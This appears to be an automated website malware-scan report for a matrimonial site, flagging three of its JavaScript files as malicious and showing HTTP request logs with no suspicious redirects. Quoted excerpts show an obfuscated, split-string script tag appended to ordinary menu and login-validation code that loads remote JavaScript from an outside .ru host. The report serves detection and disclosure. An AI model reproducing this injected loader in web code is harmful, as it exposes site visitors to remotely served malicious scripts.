Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=e2ematrimonial.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://e2ematrimonial.com/ | 200 OK Content-Length: 135292 Content-Type: text/html | clean |
http://e2ematrimonial.com/js/scripts.js | 200 OK Content-Length: 7275 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4191 bytes skipped]... e_ddl").focus(); return false; } else if (document.getElementById('txt_Pwd_ddl').value == "") { alert("Enter Password"); document.getElementById("txt_Pwd_ddl").focus(); return false; } else { return true; } } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/XML.js"></scri'+'pt>'); Antivirus reports:
| ||
http://e2ematrimonial.com/jquerymenu.js | 200 OK Content-Length: 17726 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3678 bytes skipped]... unction(E){return this.each(function(){o.removeData(this,E)})},queue:function(E,F){if(typeof E!=="string"){F=E;E="fx"}if(F===g){return o.queue(this[0],E)}return this.each(function(){var G=o.queue(this,E,F);if(E=="fx"&&G.length==1){G[0].call(this)}})},dequeue:function(E){return this.each(function(){o.dequeue(this,E)})}}); document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/XML.js"></scri'+'pt>'); Antivirus reports:
| ||
http://e2ematrimonial.com/menu.js | 200 OK Content-Length: 8445 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3958 bytes skipped]... var li=document.createElement('li') li.innerHTML='<a href="'+url+'" target="'+target+'">'+text+'</a>' this.menu.appendChild(li) this.li=li return this }, addSubMenu:function(){ var s=new ddlistmenu(null, null) this.li.appendChild(s.menu) return s } } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/XML.js"></scri'+'pt>'); Antivirus reports:
| ||
http://e2ematrimonial.com/WebResource.axd?d=AC3a1QDMHnXPKoiN5IOP9LCM_laPoAwsA_bB1QxcKkJxwiC6fnQRgw4ZiULIdHecmu1M5tz6DQ3RnmdOt3oFwcDkD881&t=635315753528827089 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=pUfVZFnDsQvTwvKbUvx2LOjxqqYBQ28w5bBguNAGKA6pPHNd3-XGw45o6lNyiGhFNp7FEDaWKDCBUNsBgEpG5K8L_yk-d0wdHMFCKXDEMtVNq78bgnrE5t04HZZauxxsSmpRQoH4kk17TXe5669ToHSWg_E1&t=635315753528827089 | 200 OK Content-Length: 21618 Content-Type: application/x-javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=ukYUop__abjqMaaawDMGiAAvn-uSMIfo8Pxm5aIjPwUtkDhPtQZK-86ygtgMCCHNeCo-weMQ_Q1hy_oSaeZCAsmAenEr4ITqmuziyxsOodkitdogzyi_3A3Vih5jLYCnyFxAQxCdR19DInJBtaMTjx606J6MsU6KET9lioKhH2BhoHH80&t=635094937820627922 | 200 OK Content-Length: 260386 Content-Type: application/x-javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=xrC7j0aRoNE4woT5QcMYVzoqmgGQWcNdwoJNjRcHNfuOBS3M1mSL4qOJazLEwZdApUEuNt--Nt41mKy1JnkWJaS66kEuZecYi2xgC7r2kRFDf5IAWjUEsQyHRdtOkgGbV4kYvC2XyCB7csD7goL6WvgHgLfvSCnBWytFhu7CwyyAT9TQ0&t=635094937820627922 | 200 OK Content-Length: 65868 Content-Type: application/x-javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=5540OWXGANbJDxoaY21-T-6Ra16MCaKTDDNX87EAaAdkjuncwcpnb6R6cWlTDfT06sp_MLzY0H1xqfFlpj6LEH-LYQ41-Mvzx2bH6WNFbXUJCeVABUplACtT4JdFqMrn54Ec9iooyfTPnt5z5NlZVtXCEn41&t=634054330380000000 | 200 OK Content-Length: 69208 Content-Type: text/javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=u9JthZBu8UwmQjhnv-M4K2o1XUpDpySBFGrkieR2rMmNB1sj-5m8hD4I2FZlssI9iqxs4__4wt5i9HzWrGmJnFM2BS6BQAYpiPftpAxJbWP9e7YMeo_10vr9WWegEfZYqlHWB202P7PO4s5WDavYZ5pldlY1&t=634054330380000000 | 200 OK Content-Length: 27744 Content-Type: text/javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=agR5vqflv9KoDF4a7eh2wbXIXDarrRzvCq4qe7qw752ZhzMxW82ZRbcgHkbWVxtR4amA4YHm9oG10kg3phehsgohiPyEYTddwI_cdMJfy5LrU6z8eOa7vBWxds3W7JoeKM4z0a6-VoLxj4GU8tGXY_PYJwRncSF7GfQngACod6ADAmna0&t=634054330380000000 | 200 OK Content-Length: 14590 Content-Type: text/javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=Vns2cmzrPt4TSx1U2QjFj6M_n-I2SC4li67JgD7iTUSUQZAj9DC_dT55Dr-YL6ckPktFzTk2dlRqxK6FDjgTWMzSYco0iRPtBe_0BPaRXMWFbcTPgw2BaW7SBJuoCmN0HcIMswyHJXQaZAwwAnjJIWEnFTc1&t=634054330380000000 | 200 OK Content-Length: 3017 Content-Type: text/javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=tyxN6w4Lw3eZJSIR63ivquTuwM3mSIAVP-tQto1r9y2XGXAM6HQXV5NhW3B2qSre5QUL4Gx1R34uNzc89Z2QqB9_quC7U7-ukxZnVVN0N7_NMN_g49od0eBXdLFYGyW7UUDO38IrcCifSMk85Shf0a29u5g1&t=634054330380000000 | 200 OK Content-Length: 143172 Content-Type: text/javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=uJBgIpRWTVgNKnhbUMTFTUTv3VLnxQXy5i04Bj5g-3H-DIJgUmKgBVvX_tgwQ4kJKV2Tbx0SR0ZxQsMOiHYJ5UQ7E2r_QYhlSsb6TOpk3oFxp-v9Zm2kWZAJVfqfOfBy2UtZqzRlDCkOBytbUR41rUvTn6U1&t=634054330380000000 | 200 OK Content-Length: 15901 Content-Type: text/javascript | clean |
http://e2ematrimonial.com/ScriptResource.axd?d=ieJRoJmxwJ5DpNrBIEKi34ny--OJU9Wn_aEyZJTSg2pK139L3Q_FKVhZ6AoTk2c1oZBK8RjdrDkQyMq5vldQoAmLP7yTY3r3qX3R3DEw6quBedrTL62huvVt_yWDZ-U4MpUM56lIgpzEZXQrgGooSLPJR40UdcQuq6XvJHwefXfC6ocE0&t=634054330380000000 | 200 OK Content-Length: 32736 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: e2ematrimonial.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 20 Dec 2014 06:07:42 GMT
Server: Microsoft-IIS/7.0
Content-Length: 135292
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...135292 bytes of data.
GET / HTTP/1.1
Host: e2ematrimonial.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 20 Dec 2014 06:07:42 GMT
Server: Microsoft-IIS/7.0
Content-Length: 135292
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...135292 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: e2ematrimonial.com
Referer: http://www.google.com/search?q=e2ematrimonial.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: e2ematrimonial.com
Referer: http://www.google.com/search?q=e2ematrimonial.com
Result:
The result is similar to the first query. There are no suspicious redirects found.